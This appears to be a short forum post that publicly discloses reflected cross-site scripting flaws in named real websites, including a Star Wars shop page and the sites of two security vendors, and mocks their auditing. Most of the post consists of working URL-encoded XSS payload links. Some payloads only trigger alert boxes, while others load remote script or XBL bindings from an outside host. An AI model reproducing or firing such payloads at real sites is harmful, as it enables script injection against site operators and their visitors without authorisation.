hrm, in the shop subdomain: https://shop.starwars.com/myaccount/forgotten_password.html?retrieve=1&goback=&email=asdf%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&LoginBtn.x=77&LoginBtn.y=11&LoginBtn=Submit

news sites don't seem to budget much in the way of web application auditing, which is sad - they have alot to lose from humiliating XSS exploiting.. and good job with yahoo by the way, search engines are often a pain .. google in particular

PCI Compliance by 'authorized' security consultants, is just another money milking scam from the merchants =.= .. hopefully these guys don't charge much, as they probably don't do much: https://www.securitymetrics.com/eval_scan.adp?action=next&mc=1&email=they+might+wanna+scan+themself%22+onmouseover%3D%22alert%28%27XSS%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22&webserver=they+might+wanna+scan+themself%22+onmouseover%3D%22alert%28%27XSS%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22

And for the Acunetix troupe who check their website 'on a daily basis to ensure no such vulnerabilities exist' .. http://support.acunetix.com/index.php?form_submit=forgot_email&mod_id=6&forgot_email=XSS+is+here.%5C%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3C%2Fscript%3E